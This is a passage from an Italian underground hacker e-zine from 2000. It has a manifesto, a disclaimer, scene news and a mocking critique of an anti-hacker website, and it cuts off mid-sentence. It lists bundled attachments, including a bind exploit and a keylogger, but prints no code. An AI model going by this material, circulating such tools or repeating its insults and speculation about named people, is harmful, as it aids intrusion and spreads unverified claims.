Copy Link
Add to Bookmark
Report

Anarchy in the System No 02

eZine's profile picture
Published in 
Anarchy in the System
 · 5 years ago

  

____ ____ ____ ____ ____ _
_ |___ \| __ \/ __ \|___ \/ __|| | _
(_)/ __ || /| ___// __ || __ \| |(_)
\____/|_|\_\\____|\____/\____/|_|
.:-!lAb0rAt0Ri0 ViRtUaLe 0kkUpAt0 & AuT0gEsTit0-z0nA fRaNcA!-:.
./PreSeNTa:\.
_
____ (_) ____
_ |___ \| |/ ___| _
(_)/ __ || |\___ \(_)
\____/|_||____/
!ANARCHY_IN_THE_SYSTEM!
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
-!!!-|HaCkInG|pHrEaKiNg|AnArChY|vIrIi|CrAcKiNg|-!!!-
|CaRdInG|cRyPtO|sCaMmInG|pRoGrAmMiNg|ElEcTrOnIc|
^^^^|WaReZ|tRaShInG|dIsInFo|UnDeRgRoUnD|666|^^^^
^|CyBeRpUnK|cHeMiStRy|NaRcOs|FrEaK|Mp3|^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
-=!!! aNNo 01 !!!=-
--[ NuMeRo2 ]--
-[aPriLe 2000]-

-=!!!|-iNtr0-|!!!=-

Benebeneee.....eccoci qui al num.2 di AiS, la nostra amatissima (?) e-zine.

Prima di tutto vorrei scusarmi in prima persona per il lungo, anzi lunghissimo
periodo di latitanza (12/99-->04/00) del sitoweb e, soprattutto della nostra
E-Zine. Speriamo che tutto cio' non accada piu',anche perche' a dir la verita',
non mi ha fatto piacere sentire gente che in IRC mi chiedeva "ma AiS e' morta?"
Invece AiS NON e' morta e non morira' mai, nonostante le difficolta' e gli
impegni esterni, riusciremo sempre a sfornare un'e-zine x soddisfare i nostri
lettori.

Come potete notare, al di sopra del logo di AiS c'e' un'altro logo...quello
del Laboratorio Virtuale Occupato & Autogestito "Area61:Zona franca" , un
progetto promosso da alcuni elementi di AiS che sta a mano mano prendendo
piede...un laboratorio del tutto simile ad un CSOA
(Centro sociale occupato & autogestito), pero' ONLINE...
Per ulteriori informazioni leggetevi l'articolo "LVOA AreA61"

Ora vi lascio alla lettura di questa e-zine che, imo, e' veramente fantastica!
(Forse sono cosi' sicuro xche' l'ho fatta anche io??? mah, ai posters l'ardua
sentenza...;-)))

Ciao a tutti!

-[dEsTr0y wItH aN aNaRchIc mInD!!!]-

---0ldir0n61---

-=!!!|-MaNifeSTo dEl gRUppO-|!!!=-

Siamo nella rete, hacker, squatter, punkabbestia, studenti, lavoratori e
disoccupati, uniti dal desiderio di rivoluzionare il sistema.
Siamo liberi, rispettiamo la liberta' degli altri, sensibilizziamo le masse
divulgando le nostre idee. Siamo una serpe in seno al sistema, siamo anarchia
nel sistema, un'utopia, un sogno, adesso una realta'!

-=!!!|-DisClAimeR lEgAlE-|!!!=-

Usa queste informazioni a TUO rischio e pericolo. Il Laboratorio Virtuale
Occupato & Autogestito "Area61: Zona Franca" Produzioni Clandestine e
qualsiasi altra persona o crew che abbia scritto articoli per questa E-Zine
non si assumera' NESSUNA responsabilita' per l'uso o l'abuso delle infos
contenute in questo testo.

Le seguenti informazioni sono state scritte SOLAMENTE per scopo didattico,
informativo e, per la maggiorparte delle volte, puramente RICREATIVO
ed EDONISTICO, e NON possono ASSOLUTAMENTE essere usati per scopi illegali.
Questa E-zine e' stata redatta semplicemente per DIVERTIRE il lettore. ;-)

Informare non e' in alcun modo illegale. Non si incoraggia tuttavia, chi
volesse usufruirne per scopi illegali, o comunque non attinenti ai principi
di civilta', di etica e morali.

Leggendo questo file tu accetti i seguenti termini: Comprendo che usare le
seguenti informazioni e' un atto illegale. Capisco e accetto di essere il SOLO
responsabile delle mie azioni. Se vengo messo nei guai da queste informazioni
NON incolpero' o tirero' nei guai coloro i quali hanno scritto questo testo o
ogni altro suo collaboratore o qualsiasi altra persona mi abbia dato questo
file. Io capisco che le informazioni qui contenute sono SOLO per scopo
didattico. Chi si dovesse ritenere offeso dagli argomenti divulgati in questo
file ESCA SUBITO!!!!!!!!! e cancelli immediatamente questo documento dal
proprio disco.

.:/ Il possesso di questo file, e' comunque del TUTTO LECITO \:.


...e per punizione 2 PATER NOSTRUM e 4 AVE MARIA! ;-)...


-=!!!|-nEwZ-|!!!=-

Eccomi qui a presentare le novita' all'uscita del num.2...

A partire da questo numero, l'e-zine sara' disponibile in formato .txt (puro,
senza scazzi!) oltre che in formato .html
Inolte l'e-zine sara' divisa in piu' pagine, per facilitare la lettura e la
stampa... a breve saranno disponibili presso il nostro sito,
Speriamo che queste modifiche possano essere vantaggiose per tutti i lettori
(dove siete?) di -[AiS]-.

FINALMENTE la nostra e-zine si potra' leggere tramite qualunque visualizzatore
di testo, avendo corretto tutti i problemi che ci erano stati nelle altre 2
uscite di AiS.

In questo numero 2 sono presenti un bel po' di articoli, direi, con qualche
novita' rispetto alle precedenti uscite.

Considerato che -[AiS]- e' l'E-zine ufficiale ed unica del LVOA Area61,
(vedi art.sotto) non saranno presenti solo articoli dedicati alla tecnica
dell'hacking ed affini... Ci sara' molto di +!

-[AiS]- e' diventata un magazine di cultura alternativa, non + SOLO una e-zine
per hacker e/o newbies e/o wannabe.

OVVIAMENTE abbiamo solo aumentato gli argomenti, e state tranquilli,
smanettoni/fans di -[AiS]-, il mondo del cyberpunk sara' sempre il +
importante dei nostri argomenti! Quindi, chi pensa che la tecnica in -[AiS]-
sia finita, si sbaglia, e di grosso!

La + grande novita' di questo numero e' sicuramente la nascita di questo
fantomatico LVOA Area61....quindi non devo fare altro che rimandarmi al
prossimo articolo, dove vi spieghero' x bene in cosa consiste...

-=!!!|-LVOA AreA61-|!!!=-

Autore: 0lDir0n61

Come ho accennato negli articoli precedenti, Anarchy in the System e' entrata
a far parte del
"Laboratorio Virtuale Occupato & Autogestito [Area61:z0nA fRaNkA]"

Il Laboratorio Virtuale Occupato & Autogestito "Area61:Zona Franca" e' nato
ufficiosamente in una sera di gennaio, in una query tra il sottoscritto e
XaRaBaS, mentre si cazzeggiava su IRC...Ufficialmente il sito del LVOA e'
presente sulla rete dalla meta' di aprile.

Questo LVOA si discostera' dalle altre realta' esistenti (CS-CSA-CSOA etc.)
solo perche' (Almeno per il momento, poi in futuro magari...) sara' solo ed
esclusivamente presente sulla rete...Tutto cio' non preclude il fatto che
AreA61 si possa sviluppare come gli altri Centri Sociali e/o Laboratori.
In un breve lasso di tempo, nasceranno e si svilupperanno nuovi progetti ed
attivita'...qui elencati i progetti gia' esistenti, oppure che sono in "sala
parto" ;-)

*AreA61 WritinG TeAm CreW di WrItinG di AreA61.
*Contro-infodroghe Sensibilizzazione all'anti-probizionismo.
*UnderGrounD Spazio dedicato a tuttocio' che c'e' "sotto-terra".
*CyberPunk Novita' dalla parte "OscUra" della rete.
*AreA61 store "Mercatino" virtuale, dove si potranno acquistare
articoli autoprodotti e non.
*FreAk SeCtion Area dedicata alla cultura "Frikkettona"
*Jugglers & Co. Spazio per i giocolieri e tutti gli"artisti di strada"
*AreA61 FrEE RaDio Radio Virtuale gestita dal LVOA
*CSOA News da tutti i CentriSociali & Laboratori d'Italia.
*TriP "Allucinazioni in rete" ;-)
*Alt. Culture Pubblicazioni e progetti alternativi.
*DiSinF0 Progetto gia' presente in AiS#1 e#2
*InfoAreA Pubblicazioni informative REALI e non manipolate.

All'interno di AreA61 ci sara', con il "flag" di attivita' principale, anche
AnArcHy iN tHe SySteM, che non cambiera' affatto le proprie impostazioni,
anzi, cerchera' sempre di piu' di migliorare, sperando in un aiuto anche da
parte vostra....

Quindi (Dedicato ai simpatizzanti di AiS) non disperate! AiS non scomparira',
semplicemente entrera' a far parte di un progetto (si spera) molto + vasto.
Continuera' ad esistere il sito (http://aisprod.cjb.net), continuera' ad
esistere la Mailing List (http://aisprodML.listbot.com), ma soprattutto
continuera' ad esistere la nostra E-Zine...
Probabilmente ci sara' solo una e-zine composta da articoli di tutte le
realta' di AreA61, ma comunque sara' SEMPRE e SOLO -[AnaRchY_iN_tHe_SySteM]-!!!

Tutti i componenti del gruppo (Se saranno daccordo) faranno parte della
divisione [Anarchy in the System Squad] e, se vorranno, potranno partecipare
attivamente all'interno del L.v.O.A...

Oltre ad AiS, collabora con il Laboratorio anche un'altro gruppo:
-[ Digital_Brains ]- che fin d'ora ringrazio per il grande aiuto che ci ha
offerto. Sperando che questa [JOINT] Venture possa continuare per molto tempo!
;-)

Ricordo a tutti L'URL dell'LVOA"area61", per sostenerci, per collaborare, o
semplicemente per navigare... http://area61.cjb.net

A breve verra' attivata anche la Mailing List di AreA61
(http://MLarea61.listbot.com), correte ad iscrivervi per tenervi aggiornati!

---0lDir0n61---

-=!!!|-c0sA fA iL rEsT0 dEl cYbErPunK iTalIan0-|!!!=-

Autore: 0ldir0n61

Eccomi a presentariv le novita' degli altri gruppi di smanettoni presenti in
Italia....

=] SpiPPolatori [=

http://www.spippolatori.com

E' uscito NetRunners11, sono uscite le FAQ di AHCCC redatte da Buttha, la sez.
Linux sta crescendo a mano a mano, il riddle e' ancora in gioco, ed a tempo
perso si divertono a fare qualche scherzetto...(vedi piu' avanti)
Inoltre il servizio di anoni-mailing made in SPP e' stato chiuso il 9/04 per
abusi di utilizzo....
Sono disponibili sul sito anche nuovi CD da acquistare....
morale della favola ceckate l'URL degli SPP e vedetevi tutto!!!!!!!!!

=] S0ftPr0ject & bFi Staff [=

http://www.s0ftpj.org

Nuovo styiling del sitoweb ed e' uscito, proprio mentre sto facendo questo
articolo (29-04),bFi8... Un numero come al solito degno dei s0ftpj, con il
formato in + parti, tecnica gia' adottata in bfi7....
Un ultima cosa destinata al Cavallo Postale:
Ti ringrazio per aver pubblicato la mia mail sul BULK (qui troverete la vers.
aggiornata)...ma almeno potevi mettere il nick GIUSTO??? Sono Oldiron, non
"Odiron"...vabbŠ, il pensiero e' quello che conta! ;-)

=] NewBies [=

http://www.spippolatori.com (mirror)

Si aspetta Newbies6, la grande rivista redatta dal grande Nobody88. Pero' da
un po' di tempo non si sa + nulla....aspettiamo con ansia e mandiamo un gran
saluto a tutta la combriccola di Newbies.


=] Wannabe [=

http://wannabe00.cjb.net

FINALMENTE e' uscito il num1 della Bellissima Rivista curata interamente da
ZioMarzo...un numero in cui e' decisamente aumentato il livello tecnico...
Veramente un bel numero! Un "continuate cos" a Bobo e ZioMarzo, sperando di
rivederli un po' di piu' in iRc, e soprattutto di vedere il num2 di wannabe
il + presto possibile

I 2 numeri di wannabe, oltre che dal proprio URL, potrete trovarli in
mirror sul sito del caro amico Quequero e della sua UIC (Vedi sotto x l'URL)

=] UIC [=

http://www.uic-spippolatori.com

Il sito di Quequero, "rettore" della UIC, e' disponibile ad un nuovo URL:
nato da un regalino degli Spp...
Il vecchio sito cmq (http://quequero.cjb.net) verra' utilizzato come mirror.
Per la cronaca e' inziato il 8ø corso, ed il 4ø corso per newbies...in piu'
ci sono pagine dedicate al Linux_Reversing ed al PSX_Cracking....
Anche se al momento il sito e' ancora UC, visto che tutte le pag. tranne
l'index, sono Err.404.


-=!!!|-gLi aLleGaTi-|!!!=-

Psc.zip --> Immagini relative all'articolo di DieseL
Yahoo.zip --> Versione originale dell'articolo di Jackal
Santo.zip --> Immagini relative all'articolo di Satanello
Ip.zip --> Versione originale dell'articolo di SONOunuomo
3dviz_3.zip --> Versione a colori dell'articolo di Quequero
Vulcan.zip --> Sorgenti in C del named/bind exploit.
Trumpet_telnet.zip --> Un client telnet migliore di quello di win...
Hooker24.zip --> KeyLogger allegato da Gouranga
LineHandset.zip --> Immagini relative all'articolo di VELENO


-=!!!|-L.I.S.A. altra CaCCa sUlLa ReTe...-|!!!=-

Autore: 0ldir0n61

Prefazione: Questo articolo e' composto da 2 parti:

La prima e' il mio articolo sulla LISA (Lega Italiana per la Soppressione degli
hAckers) redatto subito dopo aver visto per la prima volta il sito di questo
fantomatico gruppo.

La seconda parte e' l'intervista al fautore del gruppo: TanaDos.

=] pArT 0nE [=

16/04/2000
Solita serata su iRc... un topic diverso su #phreak.it...mah vediamo un po'

[23:00] ***Now talking in #phreak.it
[23:00] ***Topic is 'http://utenti.tripod.it/~Lisa_Sicurezza/ -->Ridete'

Cekko questo URL e cosa mi trovo davanti? La
"Lega Italiana per la Soppressione degli hAckers" cioe'...

L'ENNESIMA PORCATA contro tutto il cyberpunk italiano e non...

Con la carogna che comincia a farsi vedere dietro le spalle (mitico CIRO!)
continuo a navigare su questo sito...pieno di errori grammaticali (anche se
gli autori mettono le mani avanti con un bellissimo "scusate gli errori di
grammatica"), pieno di cazzate degne di TIMONE..., pieno di offese rivolte a
tutti quelli che si muovono nell'underground.

Decido quindi di teleportarmi il sito sul mio Hdd...

Comincio ad analizzare il sito...bello, soprattutto quella croce con scritto
"Hackers" come per dire: "attenzione che ora ci siamo noi!"...

(Tra parentesi i miei commenti)


-[ Manifesto ]-

===
Hackers bastardi! Da sempre impestate la rete con la
vostra presenza e i vostri programmi per fare danno alle
persone oneste. Noi gente umile abbiamo deciso di dire
basta alle vostre prepotenze e ai vostri abusi.
Noi vogliamo che la rete sia un posto dove poter chattare
in pace senza dover ogni minuto pensare di montare
un nuckers nabber o un firewall. Vogliamo che irc diventi
un luogo pulito dove amici di tutte le razze, di tutti i colori
e di tutte le religioni si incontrano per conoscersi e fare
amicizia tra di loro creando quella grande casa collettiva
e quel villaggio globale di cui tanto si parla e poco ancora
si conosce. Voi dite che il vostro unico difetto e' la curiosita'
noi vi diciamo che il vostro principale difetto e' che ci siete.
Ma da ora c'e' la LISA e la vostra vita non sara' piu' tanto
rose e fiori. I nostri mezzi sono potenti piu' dei vostri e le
nostre forze aumentano di giorno in giorno fino a quando
un giorno bellissimo riusciremo ad eliminarvi tutti quanti.
===

(L'ho incollato tutto perche' mi sembrava un delitto negarvi cotanta
comicita'. Tante cazzate, come al solito, offese su offese, ma
soprattutto: "Cos'e' un NUCKERS NABBER ?????? ;-))

-[ Scopi.htm ]-

[Qui si va veramente verso il delirio... ecco a voi i "buoni propositi" di
questi ENNESIMI Santoni (non so come altro definirli)...]

===
LA LISTA DEI NOSTRI SCOPI PRINCIPALI:

1. Eliminazione totale e completa degli hackers prima della fine dell'anno
2010

(Ve la volete prendere con comodo... e come farete? con una spruzzata di
napalm, con un POWER VIRUS [Vedi in seguito...], o forse andrete a casa
di ogni hacker con una mazza da baseball?????)

2. Reinstallazione della rete come punto di incontro e non come mercato
3. Accuisizione di novi soci e nuove iniziative per gli inscritti

(Noooooo! ACCUISIZIONE!!!!! no, non e' possibile, EDOOOOOOOOOO!!!! ;-))


4. Eliminazione di tutti i newsgroup a tema hacker col comando rmgroup

(Come??? ah quindi io da casa mia scrivo "rmgroup" e si cancella il NG?...
ci devo provare.......)

5. Distribuzione gratuita di strumenti per la lotta contro gli hackers
6. Distribuzione gratuita di documenti di qualunque tipo
7. Collaborazione con le forze di polizia per ogni abuso che ci verra' fatto

(Ma come??? prima non avevate detto: " I nostri mezzi sono potenti piu' dei
vostri e le nostre forze aumentano di giorno in giorno fino a quando
un giorno bellissimo riusciremo ad eliminarvi tutti quanti."????? Ed ora
chiedete aiuto a MAMMINA?????????)

8. Rispetto totale della legge in ogni occasione !

(E le leggi sulla diffamazione, dove le mettete?)

9. Incontri e cene tra gli inscritti per socializzare

(Piu' di 1735 persone [vedi in seguito...] a cena assieme? Bello!)

10. Presto faremo un dibattito in line a cui tutti potranno intervenire

(Un dibattito sui pattini??? Ah no, forse era ONLINE....mah!)

11. Collaborazione col Governo Degli Stati Uniti D'America per la lotta

(Tranquilli che l'US Gov. aiutera' proprio a voi....)

- Attivita' future:
Entro breve metteremo in rete un server con tutta una serie di servizi che
soltanto i nostri soci potranno usare gratis , tra i servizi ricordiamo:

> Un icq per chattare che manda i vostri messaggi cifrati col programma PGP
> Un programma in java che vi permettera' di convertire una qualunque moneta
> Un traduttore universale dall'inglese all'italiano.
> Tutti i documenti necessari e segreti per saper usare la rete come noi.
> Un completo DB di programmi di pubblico dominio che potrete prelevare via
rete
> Il linguaggio SOAP del nostro member 001 Titan simile al Quick Basic ma
meglio.

Per tutti gli altri il costo di ogni singolo servizio sara' di sole L. 10.000 ]
Ricordiamo ai non soci che per diventare soci e' sufficente richiedere la
tessera di inscizione alla L.I.S.A. al notro indirizzo postale

LISACLUBS@HOTMAIL.COM

L'inscizione costa 35.000 e comprende le spese per la stampa della tessera di
adesione e l'invio mensile di un bollettino stanpato con una stanpante laser
che vi terra' aggiornati su tutte le nostre iniziative.
I SOLDI NON CE LI TENIANO IN TASCA!!! Verranno usati per le cene e per
l'acquisto degli strumenti necessari al nostro laboratorio antiackers.

(La storia del laboratorio antiACKERS e' molto interessante, ed anche
l'offerta dell' INSCRIZIONE e' molto allettante...per 35karte mi danno anche
un cambiavaluta.... e poi cazzo, mi danno il SOAP!!! ;-))

Per l'occasione vi ricordiamo che per chi volesse contribuire alla costruzione
del laboratorio ci manca un analizzatore di rete della HP, un oscilloscopio
(anche da poco) e sopratutto una serie di computers (anche vecchi che buttate
via, 486,386, 286). Noi riutilizziamo tutto e darete una mano alla societa'
permettendoci di combattere questa minaccia mondiale.

(No comment....Ora gli hackers sono una minaccia mondiale....ma a parte questo,
A cosa puo' servirvi un oscilloscopio????
Se volete posso mettervi il progetto nel prossimo numero di
AiS...ma prima dovete rispondere alla mia domanda....ma che cazzo ci dovete
fare???)

-[ Chi sono ]-

Ma chi sono in realta' gli hackers e quale filosofia li muove?
Gli hackers sono soltanto un branco di persone scollegate tra di loro che si
uniscono a volte solo per fare qualche attacco in massa ad un sito come quello
di Yhaoo. Raramente si conoscono tra di loro, diversamente da noi che li
combattiamo!, perche' sono fondamentalmente degli individui asociali con
nessun rispetto delle cose e delle persone.

(Gli hackmeeting e gli Hack-it sono in realta' corsi di puntocroce ed
uncinetto...e le mega chat in IRC sono finte.....)

Se provata ad andare su qualche loro newsgroup come alt.hackers o alt.2600
(ce ne sono anche di quelli italiani su i newsgrop della TIN come
alt.hackers.cough.cough.cough e free.italian.hackers) vedrete che e' vero
quello che vi stiamo dicendo.

(No comment)


Tra di loro ridono e sghignazzano di noi povera gente che siamo costretti a
subire tutti i giorni i loro attacchi ai nostri personal computer.
Si intromettono dentro i nostri hd e ci prelevano i file segreti dove sono
tenute le password e tutte le nostre lettere che di solito non vorremmo mai
far vedere a nessuno.

(Qua si comincia a confondere l'immagine dell'hacker con quella del LAMER)


Queste attivita' loro le chiamano social enginering che significa in inglese
"truffare le persone". Commettono azioni illegali e per questo noi vi
consigliamo di leggervi la sezione del nostro sito che riguarda le leggi per
l'hacking in modo tale che voi potrete contestargli tutte le volte che ce ne
sara' l'occasione le cose che vi stanno facendo ed in piu' avvertire per
tempo i carabinieri o la polizia.



Loro dicono che la conoscenza e' potenza e noi qui siamo d'accordo con loro ma
se loro usano questa cosa per fare del danno noi la usiamo per risolvere i
problemi che loro ci causano. Imparate quello che c'e' da sapere e potrete
combatterli anche voi ed aiutarci a combatterli nel migliore dei modi.

Gli hacker quelli cattivi (come se ce ne fosse di buoni!) non si trovano
andando sulle chat ma spesso si incontrano quando si va su irc. Quello e' il
loro mondo e se ne trovate uno difficilmente riuscirete a riconoscerlo
perche' lui fara' finta di essere un'altra persona. Generalmente fanno finta
di essere delle donne cosi che uno ci casca e gli da il suo indirizzo
postale.

(Io in realta' mi chiamo ERIKA e raccolgo tante e-mail al giorno.)

Da quello possono risalire al vostro IP [l'ip e' un numero che vi serve per
collegarvi alla rete e che vi da il vostro provider, ognuno di voi ne ha uno
diverso e i provider ne hanno uno simile al vostro ma piu' basso nell'ultima
cifra cosi' che loro da questo possono sempre sapere da dove vi collegate e
quale'e' anche il vostro indirizzo di casa e il vostro telefono se volgiono].

(Rimando agli articoli di SONOunuomo sull'IP....mai vista una spiegazione cosi'
semplice...;))

Come fare per combatterli?

Questa domanda e' molto difficile da rispondere. Bisogna che diventiate soci
della LISA per ricevere tramite la corrispondenza con i notri tecnici e il
bollettino mensile che vi verra' inviato tutte le informazioni necessarie a
capire per bene tutta la cosa.

(Cazzo, una scuola antihacker...e che maestri!)

Comunque gia vi possiamo dire che vi servirebbe un programma di nukers nabber
che lo potete trovare gratuitamente sul sito della Telecom ma per installarlo
non e' semplice ed e' meglio prima se vi iscrivete e ve lo fate inviate da i
nostri tecnici cosi' e' piu' sicuro e riceverete tutta l'assistenza che vi
servira' gratuitamente.

(Continuo a non capire la storia del nukers nabber, e poi e' cosi' difficile
premere "install"???)

Non cercate di fare da soli ma associatevi a noi. Se fate da soli fate come
loro e rischiate di commettere azioni illegali diventando degli hacker a
vostra volta anche senza volerlo!

(E poi nelle notti di Luna piena diventerete pelosi e comincierete ad ululare
davanti al vostro PC)

I nomi di qualche hacker famoso: questo potrebbe servire per farvi mettere in
guardia quando ne incontrate uno

QUELLI AMERICANI: Mudge, Aleph1 , Xenon, Master Of Domination (MOD),
Cult dead cow (quelli di BO) e tanti altri.

QUELLI ITALIANI: Per questo vi riamandiamo alla sezione LINK dove potrete
trovare i siti messi in rete da questi bastardi.

(Basta offese, comincia ad essere troppo!)

Noi abbiamo avvertito la polizia piu' di una volta ma loro pur dicendoci che
gli avrebbero arrestati poi non hanno mai fatto niente. E lo sapete questo
perche'? Ve lo diciamo noi, loro si fanno forti del fatto che collaborano
anche loro con la polizia e i carabinieri facendogli arrestare i pedofili.

(Si, e gli ultimi bust dopo il crollo di Yahoo sono solo per tenersi in
allenamento...vi rimando all'articolo "Italian Crackdown" di cyb0rG...)

Grazie a questa cosa le forze dell'ordine li lasciano stare e gli permettono
di fare tutto quello che gli pare almeno fino a quando uno non arriva a
denunciarli.
Quindi questo e' il nostro obbiettivo principale, arrivare a denuciarli dopo
che avremo avuto la possibilita' di dimostrare un loro attacco grazie agli
strumenti messi a disposizione dalla LISA.

Ma cosa fanno in particolare?

I loro strumenti principali sono le backdoor. Le backdoor sono programmi virus
che ve li mandano dicendovi che sono dei disegni gif o jpeg e voi li aprite
senza sapere nulla. Il disegno si apre veramente ma automaticamente vi trovate
il vostro computer infettato irrimediabilmente. Per riuscire a tornare normali
la cosa miglire e fare di nuovo il format del vostro hd magari prima facendo
un backup di tutto il sistema per poter poi rivedere tutti i dati importanti
come li avevamo lasciati.

(Altra globalizzazione Hackers/Lamers)

Questi virus infatti si collocano nel boot sector del vostro hd e dopo la
formattazione sarete veramente certi di averli eliminati per sempre. Resta
pero' dopo il problema di non farsene mettere altri e per questo ci siamo noi
ad aiutarvi!

(Ormai come trovare backdoors e trojan sul proprio PC e' risaputo da tutti...
non servono sicuramente i tecnici della LiSa...)

Noi possiamo aiutarvi anche a dirvi se ne avete gia qualcuno nel vostro
computer. Se pensate che sia cosi' scriveteci subito ed iscrivetevi alla LISA
immediatamente. I nostri tecnici controlleranno tramite il vostro indirizzo
postale e il vostro IP se e' cosi' e vi daranno tutte le istruzioni e i loro
programmi per togliere tutti i tipi di backdoor esistenti
(sia quelle americane che quelle italiane) senza dover formattare.

(Un dubbio avanza nel mio CPU [Cervello] "Ma non e' che questi sono in realta'
dei lameroni che cercano "Prede" o meglio "Polli" che cascano al loro
trucchetto? Loro invece di controllare, mettono trojan a sfascio e cosi'
possono dare sfogo alle loro lamerate....come i BOSNIFFER che in realta' ti
installavano il server....)


Questi programmi sono di nostra produzione e non sono in vendita ma ve li
daremo e ve li faremo usare per un tempo illimitato gratuitamente se
diventerete nostri soci.


Noi siamo professionisti e loro sono solo dei dilettanti. Noi abbiamo
strumenti che ci permettono quando li abbiamo individuati di distruggerli per
sempre. Una volta che vi hanno fatto del danno e noi vi abbiamo rimesso a
posto il computer distruggendogli il loro dopo ci penseranno due volte prima
di attacarvi di nuovo!

(Ma a voi la legge non dice nulla? Avete la "licenza di Uccidere"? cazzo, nuovi
007!)

Abbiamo gia al notro attivo piu' di 390 Hackers distrutti e abbiamo avuti
anche i complimenti delle forze dell'ordine le quali ci hanno sepre invogliato
a continuare.

(Voglio i Nick degli Hackers "distrutti"...)

A noi non ce ne importa nulla se loro combattono i pedofili,
quelli li combattiamo anche noi perche' noi siamo dei figli e dei genitori
mentre loro sono solo dei criminali e non meritano nessuna pieta' anche se
qualche volta fanno qualcosa di buono per farvi dimenticare le loro azioni
criminali.

(Questo proprio non riesco a commentarlo perche' non ho capito il succo del
discorso! ;-))

-[Chi siamo]-

CHI SIAMO
Noi diciamo a tutti il nostro nome!!!

(Non li vedo dove sono?????)

I soci della L.I.S.A. (Lega Italiana per la Soppressione degli Ackers) sono
ormai piu' di 1735 dei quali il 73% sono italiani e il resto sono tutti
americani.

(Cioe' 1266,55 persone sono italiani, e il restante (468,45) sono americani..)

Non possiamo qui pubblicare i nomi di tutti i nostri soci per motivi di
segretezza e per evitare ritorsioni da parte degli hackers che abbiamo
distrutto nel passato ma comunque vogliamo darvi una breve panoramica sulle
nostre capacita' tenciche e sulle nostre qualifiche professinali.

(Forse perche' i soci non ci sono?)

Il webmaster di questo sito -e cioe' io- si chiama TanaDos -in realta' Andrea
per gli amici-

Devo confessare di essere stato un hackers anch'io nel passato.

(Pluralia Maiestatis...;-))

Nel 1993 fui arrestato per aver rubato dei soldi alla Banca Nazionale del
Lavoro tramite un semplice modem ad alta velocita' che avevo collegato al mio
sistema Linux che gia allora conoscevo perfettamente per via del fatto che
studiavo informatica all'universita' del Politecnico di Milano.

(Ma ad informatica si studia linux???)

Questa esperienza e i successivi
mesi di prigione mi fecero riflettere su le azioni che avevo commesso e quando
finalmente trovai un giudice che mi diede quella comprensione che forse
neanche mio padre mi aveva mai dato giurai a lui e a me stesso che mi sarei
impegnato per il resto della mia vita a combattere gli stupidi che avessero
fatto le mie stesse cose fino a farli arrestare.


Illuminante per me fu la conoscenza del gruppo Il Timone e di quello che per
anni e' stato il piu' grande avversario degli hacker italiani Eduardo Freni.

(ECCOLI QUIIIIIIIIII!!!!!! Ne ero sicuro.....non potevano mancare! Ma che
fossero loro [I TIMONANTI] travestiti da LISA??)

Eduardo che anche oggi che ha cessato la sua attivita per motivi familiari e
che mi onora della sua amicizia mi ha aiutato nella stesura di queste pagine
e spesso mi da la consulenza per arrivare la' dove le nostre menti sebbene
molto preparate tecnicamente non potrebbero arrivare.
-Il genio e' sempre il genio-

(QUI SI SFOCIA NE RIDICOLO!"IL GENIO E' SEMPRE IL GENIO"?????? MI STO
SPANZANDO DALLE RISATE! E comincio ad avere FORTISSIMI dubbi che in realta'
TanaDos sia "pilotato" proprio da EDU!)


Buona parte del gruppo Il Timone si e' iscritta alla LISA specialmente dopo i
ripetuti attacchi da parte degli hackers italiani che si fanno chiamare gli
Spippolatori comandati da un certo Frigor Mortis e da un altro Naster.
-Ho volutamente modificato di poco i loro nicks per evitare di essere
attaccato a mia volta-


(Rimando tutto a RigorMortem e Master [Non attaccatemi vi prego! ;-)] per una
loro, doverosa replica....questa e' diffamazione bella e buona, e se non
erro, i TIMONANTI se la presero anche loro con un fantomatico "FrigorMortis")


A noi questi individui non ci fanno paura. Che ci facciano vedere quello di
cui sono capaci noi sapremo fare di meglio e dopo non avranno che piangere
sulle loro rovine.

(Nessuno cerca lo scontro, ma cosi' oltre che coprirVI di ridicolo, fate
incazzare ME e TUTTI quelli che lavorano nell'underground (Hackers,Crackers,
Newbies,Wannabe,Cyberpunk,etc.etc.)

Le competenze dei nostri inscritti:

(Ora si Ride....)

Noi sappiamo programmare in HTML, in basic, in pascal, in moduli, in app, in
logo, in lisp, in visual basic, in c, in c++, in sql, in access, in excell,
in visual c e in tutti gli altri linguaggi conosciuti piu' evoluti del
momento.

(Cioe'? Secondo me VOI non conoscete nemmeno il NOME degli "altri linguaggi
conosciuti + evoluti del momento".)

Conosciamo fin troppo bene sia linux che windows95 e abbiamo a disposizione
piu' di 300 computer nei nostri laboratori che possiamo mettere tutti in rete
per fare un enorme unico computer superpotentissimo usando soltanto windows
2000.

(Bel progetto di rete....e poi se gia' avete 300 PC che cazzo vi andate a
cercare i 286 etc.?)

Siamo tutti laureati ad eccezione del sottoscritto che non ha potuto
conseguire normalmente la sua laurea per i motivi che vi ho detto sopra e non
me ne vergogno.
Comunque mi mancavano solo due esami per diventare Informatico programmatore.

(Io te la darei ad honorem dopo tutte le cazzate che hai scritto!)

Abbiamo in cassa un cospiquo gruzzoletto che ci permette di comprare ogni
settimana nuovi strumenti tecnologici per la lotta agli hackers. Di questo
dobbiamo ringraziare sopratutto i nostri tanti inscritti che spesso si levano
il pane di bocca pur di darci un aiuto economico e un sostegno morale per
continuare la lotta.

(BUAAAAAAAHHHHH, gente che preferisce non mangiare per sostentare voi, poveri
PIRLONI spara cazzate!)

6 nostri soci lavorano al MIT il Massachusset Institute of Technology e ci
sostengono quando serve facendoci tutti i calcoli matematici necessari per
riuscire a ricavare dai pochi dati che riusciamo ad ottenere dagli IP degli
hackers le informazioni ben piu' importanti che serviranno poi al loro
ritrovamento.

(Cazzarola....l'MIT, allora e' una cosa seria! Comincio ad avere paura...)

Questi calcoli non sono di pubblico dominio e in Italia li consciamo solo noi e la
polizia che ci permette di aiutarli perche collaboriamo insieme.

(Visto che collaborate segnatevi questo indirizzo: oldiron61@iname.com, gli
altri sono presenti alla fine dell'e_zine)

Abbiamo a disposizione una parabola che abbiamo costruito al MIT e che ci
permette di usare Echelon il sistema per leggere di nascosto un qualcunque
messaggio inviato per posta elettronica o per fax. Potremmo anche intercettare
le telefonate degli hackers se volessimo ma sappiamo che questa e' una cosa
illegale e quindi pur potendolo fare non ci sogniamo neanche lontanamente di
fare.

Come abbiamo specificato nei nostri scopi uno dei nostri scopi principali e'
appunto quello di rispettare la legge in ogni occasione anche se questo ci
danneggia nella lotta contro gli hackers.

Siamo forti e motivati. Siamo tanti. Saremmo sempre di piu' ogni giorno che
